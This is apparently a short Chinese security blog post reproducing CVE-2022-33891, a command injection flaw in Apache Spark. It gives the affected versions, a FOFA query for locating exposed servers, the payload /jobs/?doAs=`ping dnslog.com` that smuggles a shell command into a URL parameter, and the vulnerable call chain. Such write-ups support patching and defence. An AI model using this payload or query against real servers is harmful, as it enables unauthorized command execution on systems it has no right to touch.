Apache Spark(CVE-2022-33891)复现
2022-7-21 12:46:24 Author: 虚拟尽头(查看原文) 阅读量:225 收藏

---------------------

欢迎关注公众号:虚拟尽头

几天前看到360漏洞云发了个Spark的通告,当时想着没见过apache的这种系统,就想着复现一下,然后过了两天看到且听安全发了漏洞的详情分析

CVE-2022-33891 Apache Spark shell 命令注入漏洞

于是就想着来复现一下这个漏洞

01

影响版本以及FOFA语句

3.0.33.1.1 to 3.1.23.2.0 to 3.2.1app="APACHE-Spark" && body="3.0.3"

影响的版本范围并不多。

02

复现

payload:/jobs/?doAs=`ping dnslog.com`

03

调用流程

hrep.getParameter("doAs")checkUIViewPermissionsisUserInACLgetCurrentUserGroupsgroupMappingServiceProvider.getGroupsgetUnixGroupsexecuteAndGetOutputexecuteCommand

由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用本人负责,文章作者不为此承担任何责任。


往期文章

一次src挖洞经历(不是一个)

SRC 挖洞tips

如何做到更加细致的信息搜集(上)

如何做到更加细致的信息搜集(下)

使用Yakit快速刷取cnvd

面试经历 - 某数字厂- 安服实习生

师傅们,聊天框发送"二维码",加我好友一起交流呀(加的时候请备注来自公众号)。


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxOTM1MTU0OQ==&mid=2247484407&idx=1&sn=abc6792eef868d75350d20211d39a07e&chksm=c1a23a65f6d5b373021e93469a63b7544d844f7c5c4a4c2551ca508838dc86de749904bce51a#rd
如有侵权请联系:admin#unsafe.sh